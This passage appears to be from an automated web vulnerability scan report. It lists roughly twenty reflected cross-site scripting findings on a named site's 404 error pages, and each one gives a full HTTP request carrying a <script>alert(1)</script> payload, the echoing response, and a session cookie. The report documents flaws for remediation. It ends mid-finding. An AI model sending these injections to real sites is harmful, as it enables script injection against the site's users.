Request

GET /detail/35/themesb7e18<script>alert(1)</script>c8feaa9ba92/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesb7e18<script>alert(1)</script>c8feaa9ba92/ was not found on this server.</p>
...[SNIP]...

2.2367. http://www.resellerbase.com/detail/35/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d181<script>alert(1)</script>e7aea65a21e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/?2d181<script>alert(1)</script>e7aea65a21e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/?2d181<script>alert(1)</script>e7aea65a21e=1 was not found on this server.</p>
...[SNIP]...

2.2368. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeb66<script>alert(1)</script>21538e0517c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaeb66<script>alert(1)</script>21538e0517c/35/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaeb66<script>alert(1)</script>21538e0517c/35/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2369. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6691b<script>alert(1)</script>0fb56cc6e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/356691b<script>alert(1)</script>0fb56cc6e41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/356691b<script>alert(1)</script>0fb56cc6e41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2370. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5204<script>alert(1)</script>d8f9ede8773 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themesb5204<script>alert(1)</script>d8f9ede8773/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesb5204<script>alert(1)</script>d8f9ede8773/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2371. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85fe0<script>alert(1)</script>10865f016be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos85fe0<script>alert(1)</script>10865f016be/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos85fe0<script>alert(1)</script>10865f016be/ was not found on this server.</p>
...[SNIP]...

2.2372. http://www.resellerbase.com/detail/35/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60179<script>alert(1)</script>5d946f1d9b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/?60179<script>alert(1)</script>5d946f1d9b2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/?60179<script>alert(1)</script>5d946f1d9b2=1 was not found on this server.</p>
...[SNIP]...

2.2373. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2dbf<script>alert(1)</script>bc30d7c4935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile2dbf<script>alert(1)</script>bc30d7c4935/35/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile2dbf<script>alert(1)</script>bc30d7c4935/35/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2374. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de9d2<script>alert(1)</script>8bcd8bbfb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35de9d2<script>alert(1)</script>8bcd8bbfb55/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35de9d2<script>alert(1)</script>8bcd8bbfb55/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2375. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55156<script>alert(1)</script>4533de85774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes55156<script>alert(1)</script>4533de85774/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes55156<script>alert(1)</script>4533de85774/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2376. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18450<script>alert(1)</script>f44a3a42066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos18450<script>alert(1)</script>f44a3a42066/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos18450<script>alert(1)</script>f44a3a42066/images/ was not found on this server.</p>
...[SNIP]...

2.2377. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>f7ed79791d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images8fd5b<script>alert(1)</script>f7ed79791d1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images8fd5b<script>alert(1)</script>f7ed79791d1/ was not found on this server.</p>
...[SNIP]...

2.2378. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2df91<script>alert(1)</script>d2ac13eff6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/?2df91<script>alert(1)</script>d2ac13eff6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/?2df91<script>alert(1)</script>d2ac13eff6=1 was not found on this server.</p>
...[SNIP]...

2.2379. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7798<script>alert(1)</script>ddbcddfc44e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc7798<script>alert(1)</script>ddbcddfc44e/35/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc7798<script>alert(1)</script>ddbcddfc44e/35/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2380. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20062<script>alert(1)</script>3154bbdd3c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3520062<script>alert(1)</script>3154bbdd3c0/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3520062<script>alert(1)</script>3154bbdd3c0/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2381. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23fb7<script>alert(1)</script>79f0f0b6b2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes23fb7<script>alert(1)</script>79f0f0b6b2e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes23fb7<script>alert(1)</script>79f0f0b6b2e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2382. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c63e4<script>alert(1)</script>6fb6aaacf3e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmosc63e4<script>alert(1)</script>6fb6aaacf3e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmosc63e4<script>alert(1)</script>6fb6aaacf3e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2383. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6e639<script>alert(1)</script>29fc886c4c6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images6e639<script>alert(1)</script>29fc886c4c6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images6e639<script>alert(1)</script>29fc886c4c6/rating/ was not found on this server.</p>
...[SNIP]...

2.2384. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9186<script>alert(1)</script>78b0e5f8504 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/ratinge9186<script>alert(1)</script>78b0e5f8504/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/ratinge9186<script>alert(1)</script>78b0e5f8504/ was not found on this server.</p>
...[SNIP]...

2.2385. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b0bc<script>alert(1)</script>19c41b92b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/?7b0bc<script>alert(1)</script>19c41b92b46=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/?7b0bc<script>alert(1)</script>19c41b92b46=1 was not found on this server.</p>
...[SNIP]...

2.2386. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

